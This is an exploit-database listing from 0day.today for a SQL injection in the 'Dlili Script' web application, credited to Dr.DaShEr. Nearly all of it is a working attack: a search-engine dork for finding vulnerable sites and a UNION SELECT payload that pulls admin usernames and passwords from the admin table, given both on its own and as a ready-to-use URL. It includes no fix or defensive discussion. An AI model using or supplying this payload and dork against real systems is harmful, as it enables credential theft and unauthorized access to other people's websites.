[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dlili Script SQL Injection Vulnerability

Author
Dr.DaShEr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10756
Category
web applications
Date add
02-02-2010
Platform
unsorted
========================================
Dlili Script SQL Injection Vulnerability
========================================

  

    [+] Script:              [ dlili ]
    [+] Script site:         [ http://www.dlili.com ]
########################################################################
 
 
   [+] Dork: inurl:"links_showcat.php?"
 
 
   =[ Exploit ]=
 
   [+] links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin
 
 
   [-] SQLi p0c:
 
   [+] http://server[path]/links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin
 
 
  ###########################################################################



#  0day.today [2024-07-04]  #